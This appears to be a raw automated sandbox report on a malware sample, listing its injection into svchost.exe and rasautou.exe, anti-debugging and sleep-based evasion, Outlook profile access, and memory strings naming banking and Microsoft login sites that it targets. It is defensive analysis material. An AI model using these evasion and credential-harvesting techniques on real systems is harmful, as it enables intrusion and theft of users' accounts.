
Source: C:\Windows\SysWOW64\rasautou.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: HN1GiQ5tF7.exe

Static file information: File size 1230848 > 1048576

Source: HN1GiQ5tF7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HN1GiQ5tF7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HN1GiQ5tF7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HN1GiQ5tF7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HN1GiQ5tF7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HN1GiQ5tF7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: HN1GiQ5tF7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NkMjNSuuRDBHuZ.exe, 0000000A.00000002.3718774324.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3711481977.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: HN1GiQ5tF7.exe, 00000000.00000003.1262838797.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, HN1GiQ5tF7.exe, 00000000.00000003.1266596103.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1332695807.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1331273614.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.000000000359E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3719745368.0000000004400000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1432677538.000000000425A000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3719745368.000000000459E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1429824826.00000000040A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: HN1GiQ5tF7.exe, 00000000.00000003.1262838797.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, HN1GiQ5tF7.exe, 00000000.00000003.1266596103.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1332695807.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1331273614.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.000000000359E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 0000000B.00000002.3719745368.0000000004400000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1432677538.000000000425A000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3719745368.000000000459E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1429824826.00000000040A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: rasautou.exe, 0000000B.00000002.3720366813.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3712150364.0000000002817000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000000.1502841441.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1730647534.000000002E0DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: rasautou.exe, 0000000B.00000002.3720366813.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3712150364.0000000002817000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000000.1502841441.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1730647534.000000002E0DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: rasautou.pdbGCTL source: svchost.exe, 00000002.00000003.1390743608.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1422830982.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000003.1361027038.00000000005DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasautou.pdb source: svchost.exe, 00000002.00000003.1390743608.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1422830982.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000003.1361027038.00000000005DB000.00000004.00000020.00020000.00000000.sdmp

Source: HN1GiQ5tF7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HN1GiQ5tF7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HN1GiQ5tF7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HN1GiQ5tF7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HN1GiQ5tF7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0064E01E LoadLibraryA,GetProcAddress,

0_2_0064E01E

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00656B05 push ecx; ret	0_2_00656B18
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0063B9F6 push 00000000h; ret	0_2_0063BA2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414118 push ebx; retf	2_2_0041412D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414123 push ebx; retf	2_2_0041412D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004051D4 push ebx; retf	2_2_004051E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004151AD push edx; ret	2_2_004151AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00412A2B pushfd ; iretd	2_2_00412A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004032E0 push eax; ret	2_2_004032E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418A96 push edi; ret	2_2_00418A97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DB8C push esi; iretd	2_2_0040DB8D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004013B0 push eax; ret	2_2_004014F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004013B0 push edx; ret	2_2_00401734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004193BE push esp; retf	2_2_004193BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D415 push cs; ret	2_2_0040D42F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004014C2 push eax; ret	2_2_004014F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414CE7 push ds; iretd	2_2_00414CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414CAD push ds; iretd	2_2_00414CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040852B pushfd ; ret	2_2_00408534
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401725 push edx; ret	2_2_00401734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417F37 push ebp; ret	2_2_00417F38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004087BB push FFFFFFBBh; retf	2_2_004087BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340225F pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034027FA pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340283D push eax; iretd	2_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340135E push eax; iretd	2_2_03401369
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_03035B48 push esi; iretd	10_2_03035B49
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_03030777 push FFFFFFBBh; retf	10_2_0303077A
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_0304137A push esp; retf	10_2_0304137B
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_030353D1 push cs; ret	10_2_030353EB
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_03040A52 push edi; ret	10_2_03040A53

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00698111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00698111
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0064EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0064EB42

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0065123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0065123A

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	API/Special instruction interceptor: Address: 12F800C
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\rasautou.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\rasautou.exe	Window / User API: threadDelayed 630			Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Window / User API: threadDelayed 9343			Jump to behavior

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Evaded block: after key decision			graph_0-94288
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Evaded block: after key decision			graph_0-95178

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\rasautou.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\rasautou.exe TID: 7392	Thread sleep count: 630 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe TID: 7392	Thread sleep time: -1260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe TID: 7392	Thread sleep count: 9343 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe TID: 7392	Thread sleep time: -18686000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe TID: 7404	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe TID: 7404	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe TID: 7404	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe TID: 7404	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe TID: 7404	Thread sleep time: -49500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rasautou.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rasautou.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00676CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00676CA9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_006760DD
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_006763F9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0067EB60
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067F56F FindFirstFileW,FindClose,	0_2_0067F56F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0067F5FA
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00681B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00681B2F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00681C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00681C8A
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00681F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00681F94
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004ACC00 FindFirstFileW,FindNextFileW,FindClose,	11_2_004ACC00

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0064DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0064DDC0

Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 3q3Zl7JL.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 3q3Zl7JL.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 3q3Zl7JL.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 3q3Zl7JL.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 3q3Zl7JL.11.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002817000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3718553460.000000000108F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: 3q3Zl7JL.11.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 3q3Zl7JL.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 3q3Zl7JL.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 3q3Zl7JL.11.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 3q3Zl7JL.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 3q3Zl7JL.11.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 3q3Zl7JL.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 3q3Zl7JL.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 3q3Zl7JL.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 3q3Zl7JL.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 3q3Zl7JL.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 3q3Zl7JL.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: firefox.exe, 0000000F.00000002.1732186815.000002CD6E0CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

API call chain: ExitProcess graph end node

graph_0-94075

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417E23 LdrLoadDll,

2_2_00417E23

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00686AAF BlockInput,

0_2_00686AAF

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00633D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00633D19

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00663920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00663920

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0064E01E LoadLibraryA,GetProcAddress,

0_2_0064E01E

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_012F8278 mov eax, dword ptr fs:[00000030h]	0_2_012F8278
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_012F82D8 mov eax, dword ptr fs:[00000030h]	0_2_012F82D8
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_012F6C38 mov eax, dword ptr fs:[00000030h]	0_2_012F6C38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]	2_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
